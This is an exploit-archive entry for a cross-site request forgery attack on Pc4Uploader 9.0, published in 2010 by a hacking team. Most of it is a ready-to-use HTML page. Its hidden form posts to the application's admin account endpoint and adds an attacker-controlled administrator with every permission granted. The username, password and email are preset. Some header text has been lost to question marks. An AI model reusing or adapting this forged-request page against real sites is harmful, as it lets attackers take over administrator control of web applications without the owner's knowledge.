[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Pc4Uploader 9.0 Cross-site Request Forgery
# Published : 2010-08-27
# Author : RENO
# Previous Title : iGaming CMS Multiple SQL Injection Vulnerabilities
# Next Title : Esvon Classifieds 4.0 Multiple Vulnerabilities
# Exploit Title: pc4uploader [XSRF] Add Admin Exploit# Date: 27-08-2010# Author: RENO
# TeaM : SauDi ViRuS TeaM
# SiTe: WwW.Sa-ViRuS.CoM
# Software Link: http://www.pc4arb.com/product-10.html
<html>
<title>[SvT]</title>
<body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
<p
align="left"><font size="5"
color="#FFFFFF"><b>????????????????????????????????
???????????????
</b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin
Exploit<br>
??????????????????????????????????????????????????????????????????
??
Author : RENO<br>
?????????????????????????????????????????????????????????
??? TeaM : SauDi ViRuS TeaM<br>
???????????????????????????????????????????????????????????
??
Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
???????????????????????????????????????????????????????
????
Email : R7e@HoTMaiL.coM</font></b></p>
<p align="center">?</p>
<p align="center">?</p>
<svt>
<center>
<form method="POST" name="form" action="http://localhost/path/admin/index.php?mod=account&add=saveadmin">
<input type="hidden" name="username" value="R3NO"/>
<input type="hidden" name="password" value="SauDi_ViRuS_TeaM"/>
<input type="hidden" name="email" value="R7e@HoTMaiL.CoM"/>
<input type="hidden" name="setting_rols" value="1"/>
<input type="hidden" name="member_rols" value="1"/>
<input type="hidden" name="files_rols" value="1"/>
<input type="hidden" name="msg_rols" value="1"/>
<input type="hidden" name="news_rols" value="1"/>
<input type="hidden" name="advs_rols" value="1"/>
<input type="hidden" name="links_rols" value="1"/>
<input type="hidden" name="support_rols" value="1"/>
<input type=submit value="Submit">
</p>
</form>
</svt>
</center>
</html>